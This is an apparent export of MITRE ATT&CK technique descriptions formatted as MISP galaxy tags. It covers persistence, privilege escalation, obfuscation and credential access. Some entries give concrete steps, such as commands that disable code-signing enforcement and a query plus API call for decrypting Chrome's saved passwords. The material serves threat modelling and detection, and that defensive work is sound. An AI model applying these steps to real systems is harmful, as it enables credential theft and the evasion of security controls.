After acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).

The tag is: *misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003"*

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### Code Signing Policy Modification - T1553.006

Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system.

Some of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS.(Citation: Microsoft DSE June 2017)(Citation: Apple Disable SIP) Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.(Citation: Microsoft Unsigned Driver Apr 2017)(Citation: Apple Disable SIP)

Adversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, [Modify Registry](https://attack.mitre.org/techniques/T1112), rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP)(Citation: FireEye HIKIT Rootkit Part 2)(Citation: GitHub Turla Driver Loader) Examples of commands that can modify the code signing policy of a system include `<code>bcdedit.exe -set TESTSIGNING ON</code>` on Windows and `<code>csrutil disable</code>` on macOS.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP) Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the corner of the screen stating the system is in Test Mode). Adversaries may attempt to remove such artifacts.(Citation: F-Secure
To gain access to kernel memory to modify variables related to signature checks, such as modifying `<code>g_CiOptions</code>` to disable Driver Signature Enforcement, adversaries may conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but vulnerable driver. (Citation: Unit42 AcidBox June 2020) (Citation: GitHub Turla Driver Loader)

The tag is: `misp-galaxy:mitre-attack-pattern="Code Signing Policy Modification - T1553.006"

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### Unix Shell Configuration Modification - T1546.004

Adversaries may establish persistence through executing malicious commands triggered by a user's shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (<code>/etc</code>) and the user's home directory (<code>~/</code>) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user's environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.

Adversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the <code>/etc/profile</code> and <code>/etc/profile.d</code> files. (Citation: intezer-kaiji-malware) (Citation: bencane blog bashrc) These files typically require root permissions to modify and are executed each time any
shell on a system launches. For user level permissions, adversaries can insert malicious commands into `<code>~/.bash_profile</code>`, `<code>~/.bash_login</code>`, or `<code>~/.profile</code>` which are sourced when a user opens a command-line interface or connects remotely. (Citation: anomali-rocke-tactics) Since the system only executes the first existing file in the listed order, adversaries have used `<code>~/.bash_profile</code>` to ensure execution. Adversaries have also leveraged the `<code>~/.bashrc</code>` file which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command-line interface. (Citation: Tsunami) Some malware targets the termination of a program to trigger execution, adversaries can use the `<code>~/.bash_logout</code>` file to execute malicious commands at the end of a session.

For macOS, the functionality of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using `<code>/etc/profile</code>`, `<code>/etc/zshenv</code>`, `<code>/etc/zprofile</code>`, and `<code>/etc/zlogin</code>`.(Citation: ScriptingOSX zsh) The login shell then configures the user environment with `<code>~/.zprofile</code>` and `<code>~/.zlogin</code>`. The interactive shell uses the `<code>~/.zshrc</code>` to configure the user environment. Upon exiting, `<code>/etc/zlogout</code>` and `<code>~/.zlogout</code>` are executed. For legacy programs, macOS executes `<code>/etc/bashrc</code>` on startup.

The tag is: `misp-galaxy:mitre-attack-pattern="Unix Shell Configuration Modification - T1546.004"`

**Table 3066. Table References**

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Elevated Execution with Prompt - T1548.004

Adversaries may leverage the `<code>AuthorizationExecuteWithPrivileges</code>` API to escalate privileges by prompting the user for credentials. (Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified.

Although this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.

Adversaries may abuse `<code>AuthorizationExecuteWithPrivileges</code>` to obtain root privileges in order to install malicious software on victims and install persistence mechanisms. (Citation: Death by 1000 installers; it’s all broken!) (Citation: Carbon Black Shlayer Feb 2019) (Citation: OSX Coldroot RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036) to trick the user into granting escalated privileges to malicious code. (Citation: Death by 1000 installers; it’s all broken!) (Citation: Carbon Black Shlayer Feb 2019) This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API. (Citation: Death by 1000 installers; it’s all broken!)

The tag is: `misp-galaxy:mitre-attack-pattern="Elevated Execution with Prompt - T1548.004"`

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Application or System Exploitation - T1499.004

Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. (Citation: Sucuri BIND9 August 2015) Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent DoS condition.

The tag is: `misp-galaxy:mitre-attack-pattern="Application or System Exploitation - T1499.004"`

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Kernel Modules and Extensions - T1547.006

Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming)

When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview)

Kernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through `<code>kextload</code>` and `<code>kextunload</code>` commands. Since macOS Catalina 10.15, kernel extensions have been deprecated on macOS systems.(Citation: Apple Kernel Extension Deprecation)

Adversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir) (Citation: Trend Micro Skidmap)

The tag is: *misp-galaxy:mitre-attack-pattern="Kernel Modules and Extensions - T1547.006"*

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Services Registry Permissions Weakness - T1574.011

Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. Windows stores local service configuration information in the Registry under `<code>HKLM\SYSTEM\CurrentControlSet\Services</code>`. The information stored under a service’s Registry keys can be manipulated to modify a service’s execution parameters through tools such as the service controller, `sc.exe`,[PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through Access Control Lists and permissions. (Citation: Registry Key Security)

If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, then adversaries can change the service binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).

Adversaries may also alter Registry keys associated with service failure parameters (such as `<code>FailureCommand</code>`) that may be executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness)

The tag is: *misp-galaxy:mitre-attack-pattern="Services Registry Permissions Weakness - T1574.011"*

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Component Object Model Hijacking - T1546.015

Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system.(Citation: Microsoft Component Object Model) References to various COM objects are stored in the Registry.

Adversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.

The tag is: `misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1546.015"`

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Deobfuscate/Decode Files or Information - T1140

Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.

One such example is use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows `<code>copy /b</code>` command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016)

Sometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016)

The tag is: `misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140"`

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https://attack.mitre.org/techniques/T1140

**Obtain domain/IP registration information - T1251**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1251).

For a computing resource to be accessible to the public, domain names and IP addresses must be registered with an authorized organization. (Citation: Google Domains WHOIS) (Citation: FunAndSun2012) (Citation: Scasny2015)

The tag is: `misp-galaxy:mitre-attack-pattern="Obtain domain/IP registration information - T1251"`

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**Assign KITs/KIQs into categories - T1228**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](https://attack.mitre.org/matrices/enterprise/pre) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1228).

Leadership organizes Key Intelligence Topics (KITs) and Key Intelligence Questions (KIQs) into three types of categories and creates more if necessary. An example of a description of key players KIT would be when an adversary assesses the cyber defensive capabilities of a nation-state threat actor. (Citation: Herring1999)

The tag is: `misp-galaxy:mitre-attack-pattern="Assign KITs/KIQs into categories - T1228"`

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Receive operator KITs/KIQs tasking - T1235

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1235).

Analysts may receive intelligence requirements from leadership and begin research process to satisfy a requirement. Part of this process may include delineating between needs and wants and thinking through all the possible aspects associating with satisfying a requirement. (Citation: FBIIntelligencePrimer)

The tag is: *misp-galaxy:mitre-attack-pattern="Receive operator KITs/KIQs tasking - T1235"*

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Data Transfer Size Limits - T1030

An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.

The tag is: *misp-galaxy:mitre-attack-pattern="Data Transfer Size Limits - T1030"*

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Data from Local System - T1005

Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.

Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.

The tag is: *misp-galaxy:mitre-attack-pattern="Data from Local System - T1005"*

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**Indicator Removal on Host - T1070**

Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1552/003) and /var/log/*. These actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This that may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.

The tag is: *misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070"

**Exfiltration Over C2 Channel - T1041**

Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.

The tag is: *misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041"

**Exploitation of Remote Services - T1210**

Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.

An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Scanning](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement.
exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.

There are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services. (Citation: NVD CVE-2014-7169)

Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.

The tag is: `misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210"`

Table 3080. Table References

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System Network Configuration Discovery - T1016

Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).

Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

The tag is: `misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016"`

Table 3081. Table References

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Replication Through Removable Media - T1091

Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.

The tag is: `misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091"`

### Table 3082. Table References

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Exploitation for Client Execution - T1203

Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.

Several types exist:

#### Browser-based Exploitation

Web browsers are a common target through [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) and [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.

#### Office Applications

Common office and productivity applications such as Microsoft Office are also targeted through [Phishing](https://attack.mitre.org/techniques/T1566). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.
Common Third-party Applications

Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.

The tag is: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203"

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Change Default File Association - T1042

When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.

System file associations are listed under `<code>HKEY_CLASSES_ROOT\[extension]</code>`, for example `<code>HKEY_CLASSES_ROOT\txt</code>`. The entries point to a handler for that extension located at `<code>HKEY_CLASSES_ROOT\[handler]</code>`. The various commands are then listed as subkeys underneath the shell key at `<code>HKEY_CLASSES_ROOT\[handler]\shell\[action]\command</code>`. For example: *

- `<code>HKEY_CLASSES_ROOT\txtfile\shell\open\command</code>`
- `<code>HKEY_CLASSES_ROOT\txtfile\shell\print\command</code>`
- `<code>HKEY_CLASSES_ROOT\txtfile\shell\printto\command</code>`

The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)

The tag is: misp-galaxy:mitre-attack-pattern="Change Default File Association - T1042"

Change Default File Association - T1042 has relationships with:

- revoked-by: misp-galaxy:mitre-attack-pattern="Change Default File Association - T1546.001" with estimative-language:likelihood-probability="almost-certain"

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File and Directory Discovery - T1420

On Android, command line tools or the Java file APIs can be used to enumerate file system contents. However, Linux file permissions and SELinux policies generally strongly restrict what can be accessed by apps (without taking advantage of a privilege escalation exploit). The contents of the external storage directory are generally visible, which could present concern if sensitive data is inappropriately stored there.

iOS’s security architecture generally restricts the ability to perform file and directory discovery without use of escalated privileges.

The tag is: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1420"

Data from Removable Media - T1025

Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.

Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on removable media.

The tag is: `misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025"

Exfiltration Over Physical Medium - T1052

Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a
physical medium or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and processing device. The physical medium or device could be used as the final exfiltration point or to hop between otherwise disconnected systems.

The tag is: *misp-galaxy:mitre-attack-pattern="Exfiltration Over Physical Medium - T1052"*

### Data from Configuration Repository - T1602

Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.

Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)

The tag is: *misp-galaxy:mitre-attack-pattern="Data from Configuration Repository - T1602"*

### Obfuscated Files or Information - T1027

Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.

Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user’s action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may
also used compressed or archived scripts, such as JavaScript.

Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)

Adversaries may also obfuscate commands executed from payloads or directly via a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017)

The tag is: *misp-galaxy:mitre-attack-pattern=*"Obfuscated Files or Information - T1027"

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**Links**

- [https://attack.mitre.org/techniques/T1027](https://attack.mitre.org/techniques/T1027)
- [https://capec.mitre.org/data/definitions/267.html](https://capec.mitre.org/data/definitions/267.html)
- [https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/revoke-obfuscation-report.pdf](https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/revoke-obfuscation-report.pdf)
- [https://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/](https://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/)
- [https://github.com/danielbohannon/Revoke-Obfuscation](https://github.com/danielbohannon/Revoke-Obfuscation)
- [https://github.com/itsreallynick/office-crackros](https://github.com/itsreallynick/office-crackros)

**Communication Through Removable Media - T1092**

Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system. Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091). Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.

The tag is: *misp-galaxy:mitre-attack-pattern=*"Communication Through Removable Media - T1092"
ART (the Android Runtime) compiles optimized code on the device itself to improve performance. An adversary may be able to use escalated privileges to modify the cached code in order to hide malicious behavior. Since the code is compiled on the device, it may not receive the same level of integrity checks that are provided to code running in the system partition. (Citation: Sabanal-ART)

The tag is: `misp-galaxy:mitre-attack-pattern="Modify Cached Executable Code - T1403"

Adversaries may acquire credentials from web browsers by reading files specific to the target browser. (Citation: Talos Olympic Destroyer 2018)

Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.

For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, `<code>AppData\Local\Google\Chrome\User Data\Default\Login Data</code>` and executing a SQL query: `<code>SELECT action_url, username_value, password_value FROM logins;</code> The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function `<code>CryptUnprotectData</code>`, which uses the victim’s cached logon credentials as the decryption key. (Citation: Microsoft CryptUnprotectData April 2018)

Adversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc. (Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017)

Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials. (Citation: GitHub Mimikittenz July 2016)

After acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary’s objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).
Credentials from Web Browsers - T1503 has relationships with:

- revoked-by: Credentials from Web Browsers - T1555.003 with estimative-language:likelihood-probability="almost-certain"

File and Directory Discovery - T1083

Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Many command shell utilities can be used to obtain this information. Examples include `dir`, `tree`, `ls`, `find`, and `locate`. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106).

The tag is: *misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"*
DLL Search Order Hijacking - T1038

Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft DLL Search) Adversaries may take advantage of the Windows DLL search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence.

Adversaries may perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft 2269637) Adversaries may use this behavior to cause the program to load a malicious DLL.

Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL to maintain persistence or privilege escalation. (Citation: Microsoft DLL Redirection) (Citation: Microsoft Manifests) (Citation: Mandiant Search Order)

If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program.

Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.

The tag is: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1038"

DLL Search Order Hijacking - T1038 has relationships with:

- revoked-by: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

Table 3094. Table References

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**Deploy exploit using advertising - T1380**

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Exploits spread through advertising (malvertising) involve injecting malicious or malware-laden advertisements into legitimate online advertising networks and webpages. (Citation: TPMalvertising)

The tag is: `misp-galaxy:mitre-attack-pattern="Deploy exploit using advertising - T1380"`

**Table 3095. Table References**

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**Detect App Analysis Environment - T1440**

An adversary could evade app vetting techniques by placing code in a malicious application to detect whether it is running in an app analysis environment and, if so, avoid performing malicious actions while under analysis.

Discussion of general Android anti-analysis techniques can be found in (Citation: Petsas). Discussion of Google Play Store-specific anti-analysis techniques can be found in (Citation: Oberheide-Bouncer), (Citation: Percoco-Bouncer).

(Citation: Wang) presents a discussion of iOS anti-analysis techniques.

Platforms: Android, iOS

The tag is: `misp-galaxy:mitre-attack-pattern="Detect App Analysis Environment - T1440"`

Detect App Analysis Environment - T1440 has relationships with:


**Table 3096. Table References**

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**File System Permissions Weakness - T1044**

Processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original
process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.

Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.

**Services**

Manipulation of Windows service binaries is one variation of this technique. Adversaries may replace a legitimate service executable with their own executable to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService). Once the service is started, either directly by the user (if appropriate access is available) or through some other means, such as a system restart if the service starts on bootup, the replaced executable will run instead of the original service executable.

**Executable Installers**

Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the `<code>%TEMP%</code>` directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038). Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088). Several examples of this weakness in existing common installers have been reported to software vendors. (Citation: Mozilla Firefox Installer DLL Hijack) (Citation: Seclists Kanthak 7zip Installer)

The tag is: `misp-galaxy:mitre-attack-pattern="File System Permissions Weakness - T1044"`

File System Permissions Weakness - T1044 has relationships with:

- revoked-by: `misp-galaxy:mitre-attack-pattern="Services File Permissions Weakness - T1574.010" with estimative-language:likelihood-probability="almost-certain"`

**Table 3097. Table References**

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Obfuscated Files or Information - T1406

An app could contain malicious code in obfuscated or encrypted form, then deobfuscate or decrypt the code at runtime to evade many app vetting techniques. (Citation: Rastogi) (Citation: Zhou) (Citation: TrendMicro-Obad) (Citation: Xiao-iOS)

The tag is: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406"

Table 3098. Table References

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Obtain Device Cloud Backups - T1470

An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud backup services (e.g. Google’s Android backup service or Apple’s iCloud) could use that access to obtain sensitive data stored in device backups. For example, the Elcomsoft Phone Breaker product advertises the ability to retrieve iOS backup data from Apple’s iCloud (Citation: Elcomsoft-EPPB). Elcomsoft also describes (Citation: Elcomsoft-WhatsApp) obtaining WhatsApp communication histories from backups stored in iCloud.

